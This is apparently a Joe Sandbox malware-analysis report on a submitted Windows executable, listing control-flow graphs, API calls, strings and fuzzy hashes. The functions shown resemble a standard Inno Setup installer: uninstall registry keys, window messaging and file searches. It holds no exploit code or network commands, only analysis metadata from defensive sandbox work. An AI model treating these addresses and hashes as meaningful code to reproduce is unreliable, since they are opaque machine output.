46880c-468815 2414->2416 2417 4688bc-4688df call 47bfd8 call 403450 2415->2417 2418 468949-468957 call 414b28 2415->2418 2419 468817-46886e call 47bfd8 call 414b28 call 47bfd8 call 414b28 call 47bfd8 call 414b28 2416->2419 2420 468870-4688aa call 414b28 * 3 2416->2420 2442 4688f0-468904 call 403494 2417->2442 2443 4688e1-4688ee call 47c178 2417->2443 2427 46895c-468965 2418->2427 2419->2415 2420->2415 2431 468a75-468aa4 call 42b97c call 44e84c 2427->2431 2432 46896b-468983 call 429fe8 2427->2432 2459 468b52-468b56 2431->2459 2460 468aaa-468aae 2431->2460 2449 468985-468989 2432->2449 2450 4689fa-4689fe 2432->2450 2464 468916-468947 call 42c814 call 42cbd0 call 403494 call 414b28 2442->2464 2465 468906-468911 call 403494 2442->2465 2443->2464 2457 46898b-4689c5 call 40b44c call 47bfd8 2449->2457 2455 468a00-468a09 2450->2455 2456 468a4e-468a52 2450->2456 2455->2456 2466 468a0b-468a16 2455->2466 2462 468a66-468a70 call 42a06c 2456->2462 2463 468a54-468a64 call 42a06c 2456->2463 2517 4689c7-4689ce 2457->2517 2518 4689f4-4689f8 2457->2518 2471 468bd5-468bd9 2459->2471 2472 468b58-468b5f 2459->2472 2470 468ab0-468ac2 call 40b44c 2460->2470 2462->2431 2463->2431 2464->2427 2465->2464 2466->2456 2468 468a18-468a1c 2466->2468 2478 468a1e-468a41 call 40b44c call 406acc 2468->2478 2497 468af4-468b2b call 47bfd8 call 44cb1c 2470->2497 2498 468ac4-468af2 call 47bfd8 call 44cbec 2470->2498 2481 468c42-468c4b 2471->2481 2482 468bdb-468bf2 call 40b44c 2471->2482 2472->2471 2483 468b61-468b68 2472->2483 2527 468a43-468a46 2478->2527 2528 468a48-468a4c 2478->2528 2490 468c4d-468c65 call 40b44c call 469d68 2481->2490 2491 468c6a-468c7f call 46724c call 466fc8 2481->2491 2509 468bf4-468c30 call 40b44c call 469d68 * 2 call 469c08 2482->2509 2510 468c32-468c40 call 469d68 2482->2510 2483->2471 2493 468b6a-468b75 2483->2493 2490->2491 2542 468cd1-468cdb call 414a54 2491->2542 2543 468c81-468ca4 call 42a050 call 40b44c 2491->2543 2493->2491 2501 468b7b-468b7f 2493->2501 2535 468b30-468b34 2497->2535 2498->2535 2511 468b81-468b97 call 40b44c 2501->2511 2509->2491 2510->2491 2540 468bca-468bce 2511->2540 2541 468b99-468bc5 call 42a06c call 469d68 call 469c08 2511->2541 2517->2518 2529 4689d0-4689e2 call 406acc 2517->2529 2518->2450 2518->2457 2527->2456 2528->2456 2528->2478 2529->2518 2554 4689e4-4689ee 2529->2554 2545 468b36-468b3d 2535->2545 2546 468b3f-468b41 2535->2546 2540->2511 2547 468bd0 2540->2547 2541->2491 2555 468ce0-468cff call 414a54 2542->2555 2571 468ca6-468cad 2543->2571 2572 468caf-468cbe call 414a54 2543->2572 2545->2546 2553 468b48-468b4c 2545->2553 2546->2553 2547->2491 2553->2459 2553->2470 2554->2518 2559 4689f0 2554->2559 2567 468d01-468d24 call 42a050 call 469ec8 2555->2567 2568 468d29-468d4c call 47bfd8 call 403450 2555->2568 2559->2518 2567->2568 2586 468d4e-468d57 2568->2586 2587 468d68-468d71 2568->2587 2571->2572 2576 468cc0-468ccf call 414a54 2571->2576 2572->2555 2576->2555 2586->2587 2588 468d59-468d66 call 47c178 2586->2588 2589 468d87-468d97 call 403494 2587->2589 2590 468d73-468d85 call 403684 2587->2590 2598 468da9-468dc0 call 414b28 2588->2598 2589->2598 2590->2589 2597 468d99-468da4 call 403494 2590->2597 2597->2598 2602 468df6-468e00 call 414a54 2598->2602 2603 468dc2-468dc9 2598->2603 2607 468e05-468e2a call 403400 * 3 2602->2607 2605 468dd6-468de0 call 42b0f4 2603->2605 2606 468dcb-468dd4 2603->2606 2608 468de5-468df4 call 414a54 2605->2608 2606->2605 2606->2608 2608->2607
                                                                                                      APIs
                                                                                                        • Part of subcall function 0049529C: GetWindowRect.USER32(00000000), ref: 004952B2
                                                                                                      • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00467ADF
                                                                                                        • Part of subcall function 0041D6C0: GetObjectA.GDI32(?,00000018,00467AF9), ref: 0041D6EB
                                                                                                        • Part of subcall function 004674EC: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046758F
                                                                                                        • Part of subcall function 004674EC: ExtractIconA.SHELL32(00400000,00000000,?), ref: 004675B5
                                                                                                        • Part of subcall function 004674EC: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 0046760C
                                                                                                        • Part of subcall function 00466EAC: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467B94,00000000,00000000,00000000,0000000C,00000000), ref: 00466EC4
                                                                                                        • Part of subcall function 00495520: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 0049552A
                                                                                                        • Part of subcall function 0042ED48: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDB8
                                                                                                        • Part of subcall function 0042ED48: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDD5
                                                                                                        • Part of subcall function 004951EC: 73A0A570.USER32(00000000,?,?,?), ref: 0049520E
                                                                                                        • Part of subcall function 004951EC: SelectObject.GDI32(?,00000000), ref: 00495234
                                                                                                        • Part of subcall function 004951EC: 73A0A480.USER32(00000000,?,00495292,0049528B,?,00000000,?,?,?), ref: 00495285
                                                                                                        • Part of subcall function 00495510: MulDiv.KERNEL32(0000004B,?,00000006), ref: 0049551A
                                                                                                      • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,02089DC0,0208B944,?,?,0208B974,?,?,0208B9C4,?), ref: 00468769
                                                                                                      • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046877A
                                                                                                      • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00468792
                                                                                                        • Part of subcall function 0042A06C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A082
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$AppendExtractIconObject$A480A570AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectSelectSendSystemUserWindow
                                                                                                      • String ID: $(Default)$STOPIMAGE$k H
                                                                                                      • API String ID: 3271511185-4041106330
                                                                                                      • Opcode ID: 8c5f56ff46f7a67da8681be0a4bf9e1c58ad281b7cd8555ea36c903984038836
                                                                                                      • Instruction ID: 2b4e5e33b1fbe28ecfb2af168a793b611adbc31a6fcb8730d9662ddd01b2079a
                                                                                                      • Opcode Fuzzy Hash: 8c5f56ff46f7a67da8681be0a4bf9e1c58ad281b7cd8555ea36c903984038836
                                                                                                      • Instruction Fuzzy Hash: 6CF2C7386005208FCB00EB59D9D9F9973F5BF49304F1582BAF5049B36ADB74AC46CB9A
                                                                                                      Function 004751F8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,00475362,?,?,0049C1D0,00000000), ref: 00475251
                                                                                                      • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00475362,?,?,0049C1D0,00000000), ref: 0047532E
                                                                                                      • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00475362,?,?,0049C1D0,00000000), ref: 0047533C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                      • String ID: unins$unins???.*
                                                                                                      • API String ID: 3541575487-1009660736
                                                                                                      • Opcode ID: a837fad0235e4b9e7aba6803d3a4e161a7614f9d7543318200369ea6c4804c70
                                                                                                      • Instruction ID: 9ba6e551af2be01ae54f2bf6d4feb37662207b66b60327addd096aea054bc42d
                                                                                                      • Opcode Fuzzy Hash: a837fad0235e4b9e7aba6803d3a4e161a7614f9d7543318200369ea6c4804c70
                                                                                                      • Instruction Fuzzy Hash: 333153706005489FDB10EB65D981ADE77B9EF44344F5080F6A80CAB3B2DBB89F418B58
                                                                                                      Function 00452A4C Relevance: 3.0, APIs: 2, Instructions: 45fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,00452AAF,?,?,-00000001,00000000), ref: 00452A89
                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000,00452AAF,?,?,-00000001,00000000), ref: 00452A91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileFindFirstLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 873889042-0
                                                                                                      • Opcode ID: 8734e5af750e444322e05c8d8760e218afcb813f3cdff8847798d95c72a82f1b
                                                                                                      • Instruction ID: 2517da8cadb6fb7e7a3bde91136fc32a544ec95f0d2c756002249f4fd287b9db
                                                                                                      • Opcode Fuzzy Hash: 8734e5af750e444322e05c8d8760e218afcb813f3cdff8847798d95c72a82f1b
                                                                                                      • Instruction Fuzzy Hash: B9F0F971A04604AB8B20DBA69D0149EB7ACEB46725710467BFC14E3292EAB94E048558
                                                                                                      Function 0046E38C Relevance: 3.0, APIs: 2, Instructions: 28comCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32(0000049C,0046E422), ref: 0046E396
                                                                                                      • CoCreateInstance.OLE32(00499B98,00000000,00000001,00499BA8,?,0000049C,0046E422), ref: 0046E3B2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateInstanceVersion
                                                                                                      • String ID:
                                                                                                      • API String ID: 1462612201-0
                                                                                                      • Opcode ID: 8ad8c01d14ab9cfbb68706b1f8329e070a5efeb3acbbf88c6fea7131f03e9687
                                                                                                      • Instruction ID: ca204bcfc643a6eeda20b237376823326e775e7ff9cf44b6f5c5a065e078b710
                                                                                                      • Opcode Fuzzy Hash: 8ad8c01d14ab9cfbb68706b1f8329e070a5efeb3acbbf88c6fea7131f03e9687
                                                                                                      • Instruction Fuzzy Hash: 80F0A035282200DEEB1097AADC45B4A37C1BB20718F40007BF440D7391E3FDD8908A5F
                                                                                                      Function 00408570 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID:
                                                                                                      • API String ID: 2299586839-0
                                                                                                      • Opcode ID: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                                                      • Instruction ID: d3b8e551ebd18b966166ca098383beb9494d3946d3c482517005b7019d2e894c
                                                                                                      • Opcode Fuzzy Hash: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                                                      • Instruction Fuzzy Hash: EEE0D87170021467D711A95A9C869F7B35CA758314F00427FB949EB3C2EDB8DE8046ED
                                                                                                      Function 00423B94 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424161,?,00000000,0042416C), ref: 00423BBE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NtdllProc_Window
                                                                                                      • String ID:
                                                                                                      • API String ID: 4255912815-0
                                                                                                      • Opcode ID: f802b11f0c681854f79c5f1da5c1baf03ca951e6abaa2e26ef8ced90cdb9169e
                                                                                                      • Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
                                                                                                      • Opcode Fuzzy Hash: f802b11f0c681854f79c5f1da5c1baf03ca951e6abaa2e26ef8ced90cdb9169e
                                                                                                      • Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94
                                                                                                      Function 00455588 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NameUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 2645101109-0
                                                                                                      • Opcode ID: cd9d261bbe345dbfbc1978f69ea3c80f8509ceaa1a51dcff4dfe5a18c54a8916
                                                                                                      • Instruction ID: 445fb77b721d6e8bc33303137c5d79e403f1e24c04085a252f4bbff9531eb306
                                                                                                      • Opcode Fuzzy Hash: cd9d261bbe345dbfbc1978f69ea3c80f8509ceaa1a51dcff4dfe5a18c54a8916
                                                                                                      • Instruction Fuzzy Hash: 6AD0C271304704A3C700AAA99C825AA35DD8B84315F00483F3CC6DA3C3FABDDA481696
                                                                                                      Function 0042F530 Relevance: 1.5, APIs: 1, Instructions: 17nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F54C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NtdllProc_Window
                                                                                                      • String ID:
                                                                                                      • API String ID: 4255912815-0
                                                                                                      • Opcode ID: 333668ea2a957bd6a9fe502da343e78d2fcb082c63b96445e07994a194d2f0c0
                                                                                                      • Instruction ID: 55aff4e3ab0814f5b97a0c0db1ec4da333d3f7c11773d115dc143ade784a7ab4
                                                                                                      • Opcode Fuzzy Hash: 333668ea2a957bd6a9fe502da343e78d2fcb082c63b96445e07994a194d2f0c0
                                                                                                      • Instruction Fuzzy Hash: BAD05E7120010C7B9B00DE9CE840C6B33BC9B88700BA08825F918C7202C634ED5187A8
                                                                                                      Function 0046F300 Relevance: 72.2, APIs: 1, Strings: 40, Instructions: 500registryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 406 46f300-46f332 407 46f334-46f33b 406->407 408 46f34f 406->408 409 46f346-46f34d 407->409 410 46f33d-46f344 407->410 411 46f356-46f38e call 403634 call 403738 call 42ded0 408->411 409->411 410->408 410->409 418 46f390-46f3a4 call 403738 call 42ded0 411->418 419 46f3a9-46f3d2 call 403738 call 42ddf4 411->419 418->419 427 46f3d4-46f3dd call 46efd0 419->427 428 46f3e2-46f40b call 46f0ec 419->428 427->428 432 46f41d-46f420 call 403400 428->432 433 46f40d-46f41b call 403494 428->433 437 46f425-46f470 call 46f0ec call 42c40c call 46f134 call 46f0ec 432->437 433->437 446 46f486-46f4a7 call 455588 call 46f0ec 437->446 447 46f472-46f485 call 46f15c 437->447 454 46f4fd-46f504 446->454 455 46f4a9-46f4fc call 46f0ec call 431414 call 46f0ec call 431414 call 46f0ec 446->455 447->446 456 46f506-46f543 call 431414 call 46f0ec call 431414 call 46f0ec 454->456 457 46f544-46f54b 454->457 455->454 456->457 460 46f58c-46f5b1 call 40b44c call 46f0ec 457->460 461 46f54d-46f58b call 46f0ec * 3 457->461 479 46f5b3-46f5be call 47bfd8 460->479 480 46f5c0-46f5c9 call 403494 460->480 461->460 491 46f5ce-46f5d9 call 478d20 479->491 480->491 496 46f5e2 491->496 497 46f5db-46f5e0 491->497 498 46f5e7-46f7b1 call 403778 call 46f0ec call 47bfd8 call 46f134 call 403494 call 40357c * 2 call 46f0ec call 403494 call 40357c * 2 call 46f0ec call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 496->498 497->498 561 46f7c7-46f7d5 call 46f15c 498->561 562 46f7b3-46f7c5 call 46f0ec 498->562 566 46f7da 561->566 567 46f7db-46f824 call 46f15c call 46f190 call 46f0ec call 47bfd8 call 46f1f4 562->567 566->567 578 46f826-46f849 call 46f15c * 2 567->578 579 46f84a-46f857 567->579 578->579 580 46f926-46f92d 579->580 581 46f85d-46f864 579->581 585 46f987-46f99d RegCloseKey 580->585 586 46f92f-46f965 call 4946bc 580->586 583 46f866-46f86d 581->583 584 46f8d1-46f8e0 581->584 583->584 589 46f86f-46f893 call 430bdc 583->589 588 46f8e3-46f8f0 584->588 586->585 592 46f907-46f920 call 430c18 call 46f15c 588->592 593 46f8f2-46f8ff 588->593 589->588 601 46f895-46f896 589->601 604 46f925 592->604 593->592 597 46f901-46f905 593->597 597->580 597->592 603 46f898-46f8be call 40b44c call 47954c 601->603 609 46f8c0-46f8c6 call 430bdc 603->609 610 46f8cb-46f8cd 603->610 604->580 609->610 610->603 612 46f8cf 610->612 612->588
                                                                                                      APIs
                                                                                                        • Part of subcall function 0046F0EC: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,004763FA,?,0049C1D0,?,0046F403,?,00000000,0046F99E,?,_is1), ref: 0046F10F
                                                                                                        • Part of subcall function 0046F15C: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F7DA,?,?,00000000,0046F99E,?,_is1,?), ref: 0046F16F
                                                                                                      • RegCloseKey.ADVAPI32(?,0046F9A5,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F9F0,?,?,0049C1D0,00000000), ref: 0046F998
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value$Close
                                                                                                      • String ID: " /SILENT$5.5.0 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                                      • API String ID: 3391052094-1769338133
                                                                                                      • Opcode ID: 67f6315d958a58f45cb4284f97db66795a1d98a02650a50bcbb58ac39832d899
                                                                                                      • Instruction ID: 138fe2a8aa43a8f2517aa1aee13eacc10811dc4b0cf032f1bf39601b5d09dcc5
                                                                                                      • Opcode Fuzzy Hash: 67f6315d958a58f45cb4284f97db66795a1d98a02650a50bcbb58ac39832d899
                                                                                                      • Instruction Fuzzy Hash: 96126331A001089BCB04EB55F891ADE77F5FB49304F60807BE841AB396EB79BD49CB59
                                                                                                      Function 00492208 Relevance: 56.4, APIs: 16, Strings: 16, Instructions: 431sleepCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1027 492208-49223c call 403684 1030 49223e-49224d call 446fac Sleep 1027->1030 1031 492252-49225f call 403684 1027->1031 1036 4926e2-4926fc call 403420 1030->1036 1037 49228e-49229b call 403684 1031->1037 1038 492261-492289 call 447008 call 403738 FindWindowA call 447288 1031->1038 1046 4922ca-4922d7 call 403684 1037->1046 1047 49229d-4922c0 call 447008 call 403738 FindWindowA call 447288 1037->1047 1038->1036 1054 4922d9-49231b call 446fac * 4 SendMessageA call 447288 1046->1054 1055 492320-49232d call 403684 1046->1055 1067 4922c5 1047->1067 1054->1036 1064 49237c-492389 call 403684 1055->1064 1065 49232f-492377 call 446fac * 4 PostMessageA call 4470e0 1055->1065 1076 4923d8-4923e5 call 403684 1064->1076 1077 49238b-4923d3 call 446fac * 4 SendNotifyMessageA call 4470e0 1064->1077 1065->1036 1067->1036 1089 492412-49241f call 403684 1076->1089 1090 4923e7-49240d call 447008 call 403738 RegisterClipboardFormatA call 447288 1076->1090 1077->1036 1102 492421-49245b call 446fac * 3 SendMessageA call 447288 1089->1102 1103 492460-49246d call 403684 1089->1103 1090->1036 1102->1036 1115 49246f-4924af call 446fac * 3 PostMessageA call 4470e0 1103->1115 1116 4924b4-4924c1 call 403684 1103->1116 1115->1036 1128 492508-492515 call 403684 1116->1128 1129 4924c3-492503 call 446fac * 3 SendNotifyMessageA call 4470e0 1116->1129 1140 49256a-492577 call 403684 1128->1140 1141 492517-492535 call 447008 call 42e3a4 1128->1141 1129->1036 1151 492579-4925a5 call 447008 call 403738 call 446fac GetProcAddress 1140->1151 1152 4925f1-4925fe call 403684 1140->1152 1158 492547-492555 GetLastError call 447288 1141->1158 1159 492537-492545 call 447288 1141->1159 1183 4925e1-4925ec call 4470e0 1151->1183 1184 4925a7-4925dc call 446fac * 2 call 447288 call 4470e0 1151->1184 1164 492600-492621 call 446fac FreeLibrary call 4470e0 1152->1164 1165 492626-492633 call 403684 1152->1165 1170 49255a-492565 call 447288 1158->1170 1159->1170 1164->1036 1180 492658-492665 call 403684 1165->1180 1181 492635-492653 call 447008 call 403738 CreateMutexA 1165->1181 1170->1036 1191 49269b-4926a8 call 403684 1180->1191 1192 492667-492699 call 48c638 call 403574 call 403738 OemToCharBuffA call 48c650 1180->1192 1181->1036 1183->1036 1184->1036 1204 4926aa-4926dc call 48c638 call 403574 call 403738 CharToOemBuffA call 48c650 1191->1204 1205 4926de 1191->1205 1192->1036 1204->1036 1205->1036
                                                                                                      APIs
                                                                                                      • Sleep.KERNEL32(00000000,00000000,004926FD,?,?,?,?,00000000,00000000,00000000), ref: 00492248
                                                                                                      • FindWindowA.USER32(00000000,00000000), ref: 00492279
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
